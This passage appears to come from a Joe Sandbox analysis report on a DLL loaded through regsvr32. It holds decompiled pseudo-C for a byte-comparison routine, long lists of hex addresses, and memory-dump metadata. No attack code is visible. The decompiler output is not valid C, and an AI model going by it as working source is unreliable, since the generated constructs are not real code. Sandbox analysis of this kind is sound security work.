                                                                                                                							__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L342:
                                                                                                                								__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L344:
                                                                                                                									__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L346:
                                                                                                                										__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L349;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L346;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L344;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L342;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x1004ab05
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ab05
                                                                                                                0x1004aae0
                                                                                                                0x1004aae4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aae4
                                                                                                                0x1004aa41
                                                                                                                0x1004aa43
                                                                                                                0x1004aa5a
                                                                                                                0x1004aa62
                                                                                                                0x1004aa64
                                                                                                                0x1004aa7b
                                                                                                                0x1004aa83
                                                                                                                0x1004aa85
                                                                                                                0x1004aa9c
                                                                                                                0x1004aaa4
                                                                                                                0x1004aaa6
                                                                                                                0x1004aab3
                                                                                                                0x1004aab3
                                                                                                                0x00000000
                                                                                                                0x1004aaa6
                                                                                                                0x1004aa92
                                                                                                                0x1004aa96
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aa96
                                                                                                                0x1004aa71
                                                                                                                0x1004aa75
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aa75
                                                                                                                0x1004aa50
                                                                                                                0x1004aa54
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aa54
                                                                                                                0x1004a9b1
                                                                                                                0x1004a9b3
                                                                                                                0x1004a9ca
                                                                                                                0x1004a9d2
                                                                                                                0x1004a9d4
                                                                                                                0x1004a9eb
                                                                                                                0x1004a9f3
                                                                                                                0x1004a9f5
                                                                                                                0x1004aa0c
                                                                                                                0x1004aa14
                                                                                                                0x1004aa16
                                                                                                                0x1004aa23
                                                                                                                0x1004aa23
                                                                                                                0x00000000
                                                                                                                0x1004aa16
                                                                                                                0x1004aa02
                                                                                                                0x1004aa06
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aa06
                                                                                                                0x1004a9e1
                                                                                                                0x1004a9e5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a9e5
                                                                                                                0x1004a9c0
                                                                                                                0x1004a9c4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a9c4
                                                                                                                0x1004a921
                                                                                                                0x1004a923
                                                                                                                0x1004a93a
                                                                                                                0x1004a942
                                                                                                                0x1004a944
                                                                                                                0x1004a95b
                                                                                                                0x1004a963
                                                                                                                0x1004a965
                                                                                                                0x1004a97c
                                                                                                                0x1004a984
                                                                                                                0x1004a986
                                                                                                                0x1004a993
                                                                                                                0x1004a993
                                                                                                                0x00000000
                                                                                                                0x1004a986
                                                                                                                0x1004a972
                                                                                                                0x1004a976
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a976
                                                                                                                0x1004a951
                                                                                                                0x1004a955
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a955
                                                                                                                0x1004a930
                                                                                                                0x1004a934
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a934
                                                                                                                0x1004a891
                                                                                                                0x1004a893
                                                                                                                0x1004a8aa
                                                                                                                0x1004a8b2
                                                                                                                0x1004a8b4
                                                                                                                0x1004a8cb
                                                                                                                0x1004a8d3
                                                                                                                0x1004a8d5
                                                                                                                0x1004a8ec
                                                                                                                0x1004a8f4
                                                                                                                0x1004a8f6
                                                                                                                0x1004a903
                                                                                                                0x1004a903
                                                                                                                0x00000000
                                                                                                                0x1004a8f6
                                                                                                                0x1004a8e2
                                                                                                                0x1004a8e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a8e6
                                                                                                                0x1004a8c1
                                                                                                                0x1004a8c5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a8c5
                                                                                                                0x1004a8a0
                                                                                                                0x1004a8a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a8a4
                                                                                                                0x1004a801
                                                                                                                0x1004a803
                                                                                                                0x1004a81a
                                                                                                                0x1004a822
                                                                                                                0x1004a824
                                                                                                                0x1004a83b
                                                                                                                0x1004a843
                                                                                                                0x1004a845
                                                                                                                0x1004a85c
                                                                                                                0x1004a864
                                                                                                                0x1004a866
                                                                                                                0x1004a873
                                                                                                                0x1004a873
                                                                                                                0x00000000
                                                                                                                0x1004a866
                                                                                                                0x1004a852
                                                                                                                0x1004a856
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a856
                                                                                                                0x1004a831
                                                                                                                0x1004a835
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a835
                                                                                                                0x1004a810
                                                                                                                0x1004a814
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004a814
                                                                                                                0x1004ac76
                                                                                                                0x1004b056
                                                                                                                0x1004b056
                                                                                                                0x00000000
                                                                                                                0x1004b056
                                                                                                                0x1004ac7c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b448
                                                                                                                0x1004b448
                                                                                                                0x1004b44c
                                                                                                                0x1004b450
                                                                                                                0x1004b452
                                                                                                                0x1004b45c
                                                                                                                0x1004b45f
                                                                                                                0x1004b463
                                                                                                                0x1004b463
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b854
                                                                                                                0x1004b85c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc75
                                                                                                                0x1004bc75
                                                                                                                0x1004bc79
                                                                                                                0x1004bc7d
                                                                                                                0x1004bc7f
                                                                                                                0x1004b862
                                                                                                                0x1004b862
                                                                                                                0x1004b866
                                                                                                                0x1004b86a
                                                                                                                0x1004b86c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b876
                                                                                                                0x1004b879
                                                                                                                0x1004b87f
                                                                                                                0x1004bc98
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x1004bc89
                                                                                                                0x1004bc8c
                                                                                                                0x1004bc92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b329
                                                                                                                0x1004b329
                                                                                                                0x1004b32f
                                                                                                                0x1004b3af
                                                                                                                0x1004b3b1
                                                                                                                0x1004b3b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b3b3
                                                                                                                0x1004b331
                                                                                                                0x1004b335
                                                                                                                0x1004b339
                                                                                                                0x1004b33b
                                                                                                                0x1004b352
                                                                                                                0x1004b352
                                                                                                                0x1004b356
                                                                                                                0x1004b35a
                                                                                                                0x1004b35c
                                                                                                                0x1004b373
                                                                                                                0x1004b373
                                                                                                                0x1004b377
                                                                                                                0x1004b37b
                                                                                                                0x1004b37d
                                                                                                                0x1004b394
                                                                                                                0x1004b394
                                                                                                                0x1004b398
                                                                                                                0x1004b39c
                                                                                                                0x1004b39e
                                                                                                                0x1004b3a4
                                                                                                                0x1004b3a7
                                                                                                                0x1004b3ab
                                                                                                                0x1004b3ab
                                                                                                                0x00000000
                                                                                                                0x1004b39e
                                                                                                                0x1004b383
                                                                                                                0x1004b386
                                                                                                                0x1004b38a
                                                                                                                0x1004b38e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b38e
                                                                                                                0x1004b362
                                                                                                                0x1004b365
                                                                                                                0x1004b369
                                                                                                                0x1004b36d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b36d
                                                                                                                0x1004b341
                                                                                                                0x1004b344
                                                                                                                0x1004b348
                                                                                                                0x1004b34c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b735
                                                                                                                0x1004b735
                                                                                                                0x1004b73b
                                                                                                                0x1004b7bb
                                                                                                                0x1004b7bd
                                                                                                                0x1004b7bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b7bf
                                                                                                                0x1004b73d
                                                                                                                0x1004b741
                                                                                                                0x1004b745
                                                                                                                0x1004b747
                                                                                                                0x1004b75e
                                                                                                                0x1004b75e
                                                                                                                0x1004b762
                                                                                                                0x1004b766
                                                                                                                0x1004b768
                                                                                                                0x1004b77f
                                                                                                                0x1004b77f
                                                                                                                0x1004b783
                                                                                                                0x1004b787
                                                                                                                0x1004b789
                                                                                                                0x1004b7a0
                                                                                                                0x1004b7a0
                                                                                                                0x1004b7a4
                                                                                                                0x1004b7a8
                                                                                                                0x1004b7aa
                                                                                                                0x1004b7b0
                                                                                                                0x1004b7b3
                                                                                                                0x1004b7b7
                                                                                                                0x1004b7b7
                                                                                                                0x00000000
                                                                                                                0x1004b7aa
                                                                                                                0x1004b78f
                                                                                                                0x1004b792
                                                                                                                0x1004b796
                                                                                                                0x1004b79a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b79a
                                                                                                                0x1004b76e
                                                                                                                0x1004b771
                                                                                                                0x1004b775
                                                                                                                0x1004b779
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b779
                                                                                                                0x1004b74d
                                                                                                                0x1004b750
                                                                                                                0x1004b754
                                                                                                                0x1004b758
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb57
                                                                                                                0x1004bb57
                                                                                                                0x1004bb5d
                                                                                                                0x1004bbdc
                                                                                                                0x1004bbde
                                                                                                                0x1004bbe0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bbe0
                                                                                                                0x1004bb5f
                                                                                                                0x1004bb62
                                                                                                                0x1004bb66
                                                                                                                0x1004bb68
                                                                                                                0x1004bb7f
                                                                                                                0x1004bb7f
                                                                                                                0x1004bb83
                                                                                                                0x1004bb87
                                                                                                                0x1004bb89
                                                                                                                0x1004bba0
                                                                                                                0x1004bba0
                                                                                                                0x1004bba4
                                                                                                                0x1004bba8
                                                                                                                0x1004bbaa
                                                                                                                0x1004bbc1
                                                                                                                0x1004bbc1
                                                                                                                0x1004bbc5
                                                                                                                0x1004bbc9
                                                                                                                0x1004bbcb
                                                                                                                0x1004bbd1
                                                                                                                0x1004bbd4
                                                                                                                0x1004bbd8
                                                                                                                0x1004bbd8
                                                                                                                0x00000000
                                                                                                                0x1004bbcb
                                                                                                                0x1004bbb0
                                                                                                                0x1004bbb3
                                                                                                                0x1004bbb7
                                                                                                                0x1004bbbb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bbbb
                                                                                                                0x1004bb8f
                                                                                                                0x1004bb92
                                                                                                                0x1004bb96
                                                                                                                0x1004bb9a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb9a
                                                                                                                0x1004bb6e
                                                                                                                0x1004bb71
                                                                                                                0x1004bb75
                                                                                                                0x1004bb79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aeba
                                                                                                                0x1004aeba
                                                                                                                0x1004aec0
                                                                                                                0x1004af40
                                                                                                                0x1004af42
                                                                                                                0x1004af44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af44
                                                                                                                0x1004aec2
                                                                                                                0x1004aec6
                                                                                                                0x1004aeca
                                                                                                                0x1004aecc
                                                                                                                0x1004aee3
                                                                                                                0x1004aee3
                                                                                                                0x1004aee7
                                                                                                                0x1004aeeb
                                                                                                                0x1004aeed
                                                                                                                0x1004af04
                                                                                                                0x1004af04
                                                                                                                0x1004af08
                                                                                                                0x1004af0c
                                                                                                                0x1004af0e
                                                                                                                0x1004af25
                                                                                                                0x1004af25
                                                                                                                0x1004af29
                                                                                                                0x1004af2d
                                                                                                                0x1004af2f
                                                                                                                0x1004af35
                                                                                                                0x1004af38
                                                                                                                0x1004af3c
                                                                                                                0x1004af3c
                                                                                                                0x00000000
                                                                                                                0x1004af2f
                                                                                                                0x1004af14
                                                                                                                0x1004af17
                                                                                                                0x1004af1b
                                                                                                                0x1004af1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af1f
                                                                                                                0x1004aef3
                                                                                                                0x1004aef6
                                                                                                                0x1004aefa
                                                                                                                0x1004aefe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b24e
                                                                                                                0x1004b222
                                                                                                                0x1004b225
                                                                                                                0x1004b229
                                                                                                                0x1004b22d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b617
                                                                                                                0x1004b617
                                                                                                                0x1004b61d
                                                                                                                0x1004b69c
                                                                                                                0x1004b69e
                                                                                                                0x1004b6a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b6a0
                                                                                                                0x1004b61f
                                                                                                                0x1004b622
                                                                                                                0x1004b626
                                                                                                                0x1004b628
                                                                                                                0x1004b63f
                                                                                                                0x1004b63f
                                                                                                                0x1004b643
                                                                                                                0x1004b647
                                                                                                                0x1004b649
                                                                                                                0x1004b660
                                                                                                                0x1004b660
                                                                                                                0x1004b664
                                                                                                                0x1004b668
                                                                                                                0x1004b66a
                                                                                                                0x1004b681
                                                                                                                0x1004b681
                                                                                                                0x1004b685
                                                                                                                0x1004b689
                                                                                                                0x1004b68b
                                                                                                                0x1004b691
                                                                                                                0x1004b694
                                                                                                                0x1004b698
                                                                                                                0x1004b698
                                                                                                                0x00000000
                                                                                                                0x1004b68b
                                                                                                                0x1004b670
                                                                                                                0x1004b673
                                                                                                                0x1004b677
                                                                                                                0x1004b67b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b67b
                                                                                                                0x1004b64f
                                                                                                                0x1004b652
                                                                                                                0x1004b656
                                                                                                                0x1004b65a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b65a
                                                                                                                0x1004b62e
                                                                                                                0x1004b631
                                                                                                                0x1004b635
                                                                                                                0x1004b639
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba38
                                                                                                                0x1004ba38
                                                                                                                0x1004ba3e
                                                                                                                0x1004babd
                                                                                                                0x1004babf
                                                                                                                0x1004bac1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bac1
                                                                                                                0x1004ba40
                                                                                                                0x1004ba43
                                                                                                                0x1004ba47
                                                                                                                0x1004ba49
                                                                                                                0x1004ba60
                                                                                                                0x1004ba60
                                                                                                                0x1004ba64
                                                                                                                0x1004ba68
                                                                                                                0x1004ba6a
                                                                                                                0x1004ba81
                                                                                                                0x1004ba81
                                                                                                                0x1004ba85
                                                                                                                0x1004ba89
                                                                                                                0x1004ba8b
                                                                                                                0x1004baa2
                                                                                                                0x1004baa2
                                                                                                                0x1004baa6
                                                                                                                0x1004baaa
                                                                                                                0x1004baac
                                                                                                                0x1004bab2
                                                                                                                0x1004bab5
                                                                                                                0x1004bab9
                                                                                                                0x1004bab9
                                                                                                                0x00000000
                                                                                                                0x1004baac
                                                                                                                0x1004ba91
                                                                                                                0x1004ba94
                                                                                                                0x1004ba98
                                                                                                                0x1004ba9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba9c
                                                                                                                0x1004ba70
                                                                                                                0x1004ba73
                                                                                                                0x1004ba77
                                                                                                                0x1004ba7b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba7b
                                                                                                                0x1004ba4f
                                                                                                                0x1004ba52
                                                                                                                0x1004ba56
                                                                                                                0x1004ba5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad9c
                                                                                                                0x1004ad9c
                                                                                                                0x1004ada2
                                                                                                                0x1004ae21
                                                                                                                0x1004ae23
                                                                                                                0x1004ae25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae25
                                                                                                                0x1004ada4
                                                                                                                0x1004ada7
                                                                                                                0x1004adab
                                                                                                                0x1004adad
                                                                                                                0x1004adc4
                                                                                                                0x1004adc4
                                                                                                                0x1004adc8
                                                                                                                0x1004adcc
                                                                                                                0x1004adce
                                                                                                                0x1004ade5
                                                                                                                0x1004ade5
                                                                                                                0x1004ade9
                                                                                                                0x1004aded
                                                                                                                0x1004adef
                                                                                                                0x1004ae06
                                                                                                                0x1004ae06
                                                                                                                0x1004ae0a
                                                                                                                0x1004ae0e
                                                                                                                0x1004ae10
                                                                                                                0x1004ae16
                                                                                                                0x1004ae19
                                                                                                                0x1004ae1d
                                                                                                                0x1004ae1d
                                                                                                                0x00000000
                                                                                                                0x1004ae10
                                                                                                                0x1004adf5
                                                                                                                0x1004adf8
                                                                                                                0x1004adfc
                                                                                                                0x1004ae00
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae00
                                                                                                                0x1004add4
                                                                                                                0x1004add7
                                                                                                                0x1004addb
                                                                                                                0x1004addf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004addf
                                                                                                                0x1004adb3
                                                                                                                0x1004adb6
                                                                                                                0x1004adba
                                                                                                                0x1004adbe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b17c
                                                                                                                0x1004b17c
                                                                                                                0x1004b182
                                                                                                                0x1004b201
                                                                                                                0x1004b203
                                                                                                                0x1004b205
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b205
                                                                                                                0x1004b184
                                                                                                                0x1004b187
                                                                                                                0x1004b18b
                                                                                                                0x1004b18d
                                                                                                                0x1004b1a4
                                                                                                                0x1004b1a4
                                                                                                                0x1004b1a8
                                                                                                                0x1004b1ac
                                                                                                                0x1004b1ae
                                                                                                                0x1004b1c5
                                                                                                                0x1004b1c5
                                                                                                                0x1004b1c9
                                                                                                                0x1004b1cd
                                                                                                                0x1004b1cf
                                                                                                                0x1004b1e6
                                                                                                                0x1004b1e6
                                                                                                                0x1004b1ea
                                                                                                                0x1004b1ee
                                                                                                                0x1004b1f0
                                                                                                                0x1004b1f6
                                                                                                                0x1004b1f9
                                                                                                                0x1004b1fd
                                                                                                                0x1004b1fd
                                                                                                                0x00000000
                                                                                                                0x1004b1f0
                                                                                                                0x1004b1d5
                                                                                                                0x1004b1d8
                                                                                                                0x1004b1dc
                                                                                                                0x1004b1e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b55d
                                                                                                                0x1004b531
                                                                                                                0x1004b534
                                                                                                                0x1004b538
                                                                                                                0x1004b53c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b53c
                                                                                                                0x1004b510
                                                                                                                0x1004b513
                                                                                                                0x1004b517
                                                                                                                0x1004b51b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b91a
                                                                                                                0x1004b91a
                                                                                                                0x1004b920
                                                                                                                0x1004b99f
                                                                                                                0x1004b9a1
                                                                                                                0x1004b9a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9a3
                                                                                                                0x1004b922
                                                                                                                0x1004b925
                                                                                                                0x1004b929
                                                                                                                0x1004b92b
                                                                                                                0x1004b942
                                                                                                                0x1004b942
                                                                                                                0x1004b946
                                                                                                                0x1004b94a
                                                                                                                0x1004b94c
                                                                                                                0x1004b963
                                                                                                                0x1004b963
                                                                                                                0x1004b967
                                                                                                                0x1004b96b
                                                                                                                0x1004b96d
                                                                                                                0x1004b984
                                                                                                                0x1004b984
                                                                                                                0x1004b988
                                                                                                                0x1004b98c
                                                                                                                0x1004b98e
                                                                                                                0x1004b994
                                                                                                                0x1004b997
                                                                                                                0x1004b99b
                                                                                                                0x1004b99b
                                                                                                                0x00000000
                                                                                                                0x1004b98e
                                                                                                                0x1004b973
                                                                                                                0x1004b976
                                                                                                                0x1004b97a
                                                                                                                0x1004b97e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b97e
                                                                                                                0x1004b952
                                                                                                                0x1004b955
                                                                                                                0x1004b959
                                                                                                                0x1004b95d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b95d
                                                                                                                0x1004b931
                                                                                                                0x1004b934
                                                                                                                0x1004b938
                                                                                                                0x1004b93c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ac8a
                                                                                                                0x1004ac90
                                                                                                                0x1004ad03
                                                                                                                0x1004ad05
                                                                                                                0x1004ad07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad07
                                                                                                                0x1004ac92
                                                                                                                0x1004ac95
                                                                                                                0x1004ac99
                                                                                                                0x1004ac9b
                                                                                                                0x1004acae
                                                                                                                0x1004acae
                                                                                                                0x1004acb2
                                                                                                                0x1004acb6
                                                                                                                0x1004acb8
                                                                                                                0x1004accb
                                                                                                                0x1004accb
                                                                                                                0x1004accf
                                                                                                                0x1004acd3
                                                                                                                0x1004acd5
                                                                                                                0x1004ace8
                                                                                                                0x1004ace8
                                                                                                                0x1004acec
                                                                                                                0x1004acf0
                                                                                                                0x1004acf2
                                                                                                                0x1004acf8
                                                                                                                0x1004acfb
                                                                                                                0x1004acff
                                                                                                                0x1004acff
                                                                                                                0x00000000
                                                                                                                0x1004acf2
                                                                                                                0x1004acdb
                                                                                                                0x1004acde
                                                                                                                0x1004ace2
                                                                                                                0x1004ace6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ace6
                                                                                                                0x1004acbe
                                                                                                                0x1004acc1
                                                                                                                0x1004acc5
                                                                                                                0x1004acc9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004acc9
                                                                                                                0x1004aca1
                                                                                                                0x1004aca4
                                                                                                                0x1004aca8
                                                                                                                0x1004acac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b05e
                                                                                                                0x1004b064
                                                                                                                0x1004b0e3
                                                                                                                0x1004b0e5
                                                                                                                0x1004b0e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0e7
                                                                                                                0x1004b066
                                                                                                                0x1004b069
                                                                                                                0x1004b06d
                                                                                                                0x1004b06f
                                                                                                                0x1004b086
                                                                                                                0x1004b086
                                                                                                                0x1004b08a
                                                                                                                0x1004b08e
                                                                                                                0x1004b090
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0ab
                                                                                                                0x1004b0af
                                                                                                                0x1004b0b1
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0cc
                                                                                                                0x1004b0d0
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0d8
                                                                                                                0x1004b0db
                                                                                                                0x1004b0df
                                                                                                                0x1004b0df
                                                                                                                0x00000000
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0b7
                                                                                                                0x1004b0ba
                                                                                                                0x1004b0be
                                                                                                                0x1004b0c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0c2
                                                                                                                0x1004b096
                                                                                                                0x1004b099
                                                                                                                0x1004b09d
                                                                                                                0x1004b0a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0a1
                                                                                                                0x1004b075
                                                                                                                0x1004b078
                                                                                                                0x1004b07c
                                                                                                                0x1004b080
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b46a
                                                                                                                0x1004b470
                                                                                                                0x1004b4ef
                                                                                                                0x1004b4f1
                                                                                                                0x1004b4f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4f3
                                                                                                                0x1004b472
                                                                                                                0x1004b475
                                                                                                                0x1004b479
                                                                                                                0x1004b47b
                                                                                                                0x1004b492
                                                                                                                0x1004b492
                                                                                                                0x1004b496
                                                                                                                0x1004b49a
                                                                                                                0x1004b49c
                                                                                                                0x1004b4b3
                                                                                                                0x1004b4b3
                                                                                                                0x1004b4b7
                                                                                                                0x1004b4bb
                                                                                                                0x1004b4bd
                                                                                                                0x1004b4d4
                                                                                                                0x1004b4d4
                                                                                                                0x1004b4d8
                                                                                                                0x1004b4dc
                                                                                                                0x1004b4de
                                                                                                                0x1004b4e4
                                                                                                                0x1004b4e7
                                                                                                                0x1004b4eb
                                                                                                                0x1004b4eb
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
